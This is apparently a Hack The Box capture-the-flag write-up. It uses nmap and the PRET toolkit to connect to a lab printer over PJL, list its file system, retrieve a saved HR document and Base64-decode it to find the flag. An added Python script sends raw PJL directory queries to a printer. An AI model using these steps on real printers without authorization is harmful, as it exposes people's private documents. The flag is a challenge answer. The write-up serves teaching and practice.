Gawk
We are told that someone needs help with a printer. We only have an IP address and a port. nmap does not show any useful information:
$ nmap -Pn -sV 167.99.207.74 -p 32108
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 167.99.207.74
Host is up (0.079s latency).
PORT STATE SERVICE VERSION
32108/tcp open unknown
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.94 seconds
Using PJL
After reading a bit on printer exploitation, I found PRET, which is a tool to interact with printers using PostScript or PJL (printer languages). It works with Python version 2, so let’s use a Docker container:
$ docker run --rm -v "${PWD}":/home/rocky -it python:2.7 bash
root@48962fe51979:/# pip2.7 install colorama
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. A future version of pip will drop support for Python 2.7. More details about Python 2 support in pip, can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support
Collecting colorama
Downloading colorama-0.4.6-py2.py3-none-any.whl (25 kB)
Installing collected packages: colorama
Successfully installed colorama-0.4.6
WARNING: You are using pip version 20.0.2; however, version 20.3.4 is available.
You should consider upgrading via the '/usr/local/bin/python -m pip install --upgrade pip' command.
root@48962fe51979:/# python2.7 /home/rocky/PRET/pret.py 167.99.207.74:32108 pjl
[PRET ASCII-art banner]
PRET | Printer Exploitation Toolkit v0.40
by Jens Mueller <jens.a.mueller@rub.de>
「 pentesting tool that made dumpster diving obsolete‥ 」
(ASCII art by Jan Foerster)
Connection to 167.99.207.74:32108 established
Device: hp LaserJet 4200
Welcome to the pret shell. Type help or ? to list commands.
167.99.207.74:32108:/>
We see that we have successfully connected to an HP LaserJet printer. We can use these options:
167.99.207.74:32108:/> ?
Available commands (type help <topic>):
=======================================
append delete edit free info mkdir printenv set unlock
cat destroy env fuzz load nvram put site version
cd df exit get lock offline pwd status
chvol disable find help loop open reset timeout
close discover flood hold ls pagecount restart touch
debug display format id mirror print selftest traversal
For example:
167.99.207.74:32108:/> pwd
0:/
167.99.207.74:32108:/> ls
d - PJL
d - PostScript
d - saveDevice
d - webServer
Let’s enumerate all files and directories with find:
167.99.207.74:32108:/> find
/PJL/
/PostScript/
/saveDevice/
/saveDevice/SavedJobs/
/saveDevice/SavedJobs/InProgress/
/saveDevice/SavedJobs/InProgress/HR_Policies.pdf
/saveDevice/SavedJobs/KeepJob/
/webServer/
/webServer/default/
/webServer/default/csconfig
/webServer/home/
/webServer/home/device.html
/webServer/home/hostmanifest
/webServer/lib/
/webServer/lib/keys
/webServer/lib/security
/webServer/objects/
/webServer/permanent/
There is a file that stands out (HR_Policies.pdf). Let’s get it:
167.99.207.74:32108:/> get /saveDevice/SavedJobs/InProgress/HR_Policies.pdf
41893 bytes received.
167.99.207.74:32108:/> exit
I was expecting a PDF file, but it only contains ASCII data (in fact, a Base64-encoded string):
root@48962fe51979:/# file HR_Policies.pdf
HR_Policies.pdf: ASCII text
root@48962fe51979:/# cat HR_Policies.pdf
...
MCBuIAowMDAwMDIyNjUwIDAwMDAwIG4gCjAwMDAwMjMxMzQgMDAwMDAgbiAKMDAwMDAyOTQ4NSAw
MDAwMCBuIAowMDAwMDI5NzE0IDAwMDAwIG4gCjAwMDAwMjk5NDEgMDAwMDAgbiAKdHJhaWxlcgo8
PC9TaXplIDI4Ci9Sb290IDE1IDAgUgovSW5mbyAxIDAgUj4+CnN0YXJ0eHJlZgozMDM3MgolJUVP
Rg==
So, let’s decode it and save it as a proper PDF file:
root@48962fe51979:/# base64 -d HR_Policies.pdf > /home/rocky/HR_Policies.pdf
root@48962fe51979:/# file /home/rocky/HR_Policies.pdf
/home/rocky/HR_Policies.pdf: PDF document, version 1.4
root@48962fe51979:/# exit
exit
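The same two steps PRET performed above (list a PJL volume directory, then check whether a retrieved job is a Base64-wrapped PDF) as a small added audit script, not part of the original writeup or of PRET. It assumes the PJL FSDIRLIST reply format (one "name TYPE=DIR|FILE [SIZE=n]" line per entry, terminated by a form feed); the directory listing and job bytes embedded below are constructed samples, not data captured from the device.

```python
import base64
import re
import socket

# Constructed sample of a PJL FSDIRLIST reply (not captured from the real printer):
# the command is echoed, one entry per line follows, a form feed (0x0C) ends the reply.
SAMPLE_DIRLIST = (
    '@PJL FSDIRLIST NAME="0:\\saveDevice\\SavedJobs\\InProgress" ENTRY=1\r\n'
    '. TYPE=DIR\r\n'
    '.. TYPE=DIR\r\n'
    'HR_Policies.pdf TYPE=FILE SIZE=41893\r\n'
    '\x0c'
)
# Constructed sample job: Base64 of "%PDF-1.4\n", line-wrapped like the file above.
SAMPLE_JOB = b'JVBERi0x\nLjQK\n'

ENTRY_RE = re.compile(r'^(?P<name>.+?) TYPE=(?P<type>DIR|FILE)(?: SIZE=(?P<size>\d+))?$')

def pjl_query(host, port, command, timeout=5.0):
    """Send one PJL command (wrapped in the standard UEL sequence) and read up to the form feed."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b'\x1b%-12345X' + command.encode() + b'\r\n\x1b%-12345X')
        data = b''
        while b'\x0c' not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.decode('latin-1')

def parse_dirlist(reply):
    """Return (name, type, size) tuples; the echoed header and '.'/'..' are skipped."""
    entries = []
    for line in reply.replace('\x0c', '').splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m or m.group('name') in ('.', '..'):
            continue
        size = int(m.group('size')) if m.group('size') else None
        entries.append((m.group('name'), m.group('type'), size))
    return entries

def unwrap_job(data):
    """Classify a retrieved job: raw PDF, Base64 text wrapping a PDF, other Base64, or unknown."""
    if data.startswith(b'%PDF'):
        return 'pdf', data
    try:  # whitespace is stripped first so line-wrapped Base64 (as in HR_Policies.pdf) validates
        decoded = base64.b64decode(b''.join(data.split()), validate=True)
    except Exception:
        return 'unknown', data
    return ('base64-pdf', decoded) if decoded.startswith(b'%PDF') else ('base64', decoded)
```

To run it against a real device, pass the FSDIRLIST command to pjl_query and feed its reply to parse_dirlist; the sample constants let the parsing and unwrapping logic be exercised offline.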
Flag
If we open the PDF file, we will see the flag on the first page:
HTB{tr4v3rs3_m4n4g3ment_d3240!}